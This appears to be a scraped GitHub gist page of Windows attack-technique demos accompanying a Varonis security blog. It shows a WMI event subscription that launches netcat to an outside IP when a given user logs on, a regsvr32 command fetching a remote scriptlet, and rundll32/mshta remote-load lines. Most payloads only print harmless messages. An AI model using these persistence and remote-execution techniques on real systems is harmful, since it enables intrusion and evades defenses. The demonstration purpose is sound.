This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
powershell -noexit -noprofile -C {Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 172.31.18.92 10000 }}}} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 172.31.18.92 10000 }}} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 172.31.18.92 10000 }}} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
regsvr32 /s /n /u /i:https://gist.githubusercontent.com/agreenjay/c6cc5066b453b909f5ae0542504c1b6e/raw/c58b9f4fe3ac5251630a2948222cd8909e6ce1dc/scripty2.sct |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
<scriptlet> | |
<public> | |
</public> | |
<script language="JScript"> | |
<![CDATA[ | |
window.alert("hello"); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
<scriptlet> | |
<public> | |
</public> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("powershell -noe write-host Booo!"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
<scriptlet> | |
<public> | |
</public> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("powershell -noe -nop write-host"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="TESTING" | |
classid="{A1112221-0000-0000-3000-000DA00DABFC}" > | |
<script language="JScript"> | |
<![CDATA[ | |
var foo = new ActiveXObject("WScript.Shell").Run("echo If you see this message, you need to review your security. See blog.varonis.com for answers"); | |
]]> | |
</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
write-host "If you see this message, you have lots of security mitigation work ahead of you!" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
write-host "Watching GIF animations showing JavaScript malware launched from an ADS" | |
start-sleep -seconds 4 | |
write-host "can be strangely compelling." | |
start-sleep -seconds 4 | |
write-host "You'll want to watch this video over and over " | |
start-sleep -seconds 5 | |
write-host "and over. And now you have an uncontrollabe urge to click the CTA." | |
start-sleep -seconds 3 | |
write-host "The one that says Free Varonis Demo!" |
NewerOlder